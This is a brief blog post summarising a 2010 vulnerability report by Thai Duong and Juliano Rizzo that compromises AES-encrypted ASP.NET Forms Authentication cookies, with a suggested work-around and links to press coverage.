Web Access Management: Security Hack Exposes ASP.NET Forms Authentication

ASP.NET Forms are a pretty common mechanism for web access management (when combined with NTFS permissions) for .NET web applications. Security researchers, Thai Duong and Juliano Rizzo have discovered a technique to compromise an ASP.NET Forms Authentication cookie when using AES encryption.

It’s worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It’s just a matter of time.

The work around seems to be don’t use AES (until MS releases a patch).

The method, why and mitigations are described over here: http://visualstudiomagazine.com/articles/2010/09/14/aspnet-security-hack.aspx

More coverage here: http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310

One comment to “Web Access Management: Security Hack Exposes ASP.NET Forms Authentication”

Leave a Reply